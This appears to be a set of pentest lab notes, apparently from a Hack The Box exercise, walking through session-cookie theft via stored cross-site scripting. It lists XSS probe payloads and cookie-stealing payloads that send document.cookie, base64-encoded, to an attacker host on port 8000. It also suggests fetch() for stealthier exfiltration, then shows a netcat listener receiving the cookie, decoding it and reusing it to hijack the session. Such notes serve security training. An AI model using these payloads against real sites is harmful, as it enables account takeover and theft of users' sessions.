OBTAINING SESSION COOKIES (NETCAT SERVER)
#discovery
root@oco:~$ BROWSER > {targetSite:port}
input field 1: "><img src=x onerror=prompt(document.domain)>
input field 2: "><img src=x onerror=confirm(1)>
input field 3: "><img src=x onerror=alert(1)>
* this will identify which field is vulnerable to XSS
* the document.domain is used to ensure that JavaScript is being executed on the
actual domain and not in a sandboxed environment.
- JavaScript being executed in a sandboxed environment prevents client-side
attacks, but there are sandbox escapes exists
* if no automatic triggers occur, utilize the site/page button to trigger them
#check if HTTPOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
HttpOnly: False
Secure: False
SameSite: Noneroot@oco:~$ BROWSER > {targetSite:port}
vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
* We don't necessarily have to use the window.location() object that causes victims
to get redirected. We can use fetch(), which can fetch data (cookies) and send
it to our server without any redirects. This is a stealthier way.
* another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
root@oco:~$ nc -nlvp 8000
listening on [any] 8000 ...#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
* log in to the application
root@target:~$ BROWSER > http://xss.htb.net/[email protected]
* view the public profile
- this is the attacker-crafted public profile that hosts our cookie-stealing payload
- this is an attacker-controlled public profile hosting a cookie-stealing payload leveraging the stored XSS vulnerability
* the time the target hover over the "test" link, the script will trigger and send the target's cookie data to the attacker's server
root@oco:~$ netcat...
listening on [any] 8000 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.14.36] 37106
GET /?cookie=YXV0aC1zZXNzaW9...
* the cookie is in a Base64 value because of the btoa() function which base64 encodes the cookie's value
#decode
root@oco:~$ BROWSER > {anySite} > F12 > Console
input: atob("YXV0aC1zZXNzaW9...")
output: auth-session=s%3AQZOROUpdXhN0
root@oco:~$ BROWSER > New Private Windows > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
Name: {auth-session}
Value: {cookieValue}
* refresh the target page to executeLast updated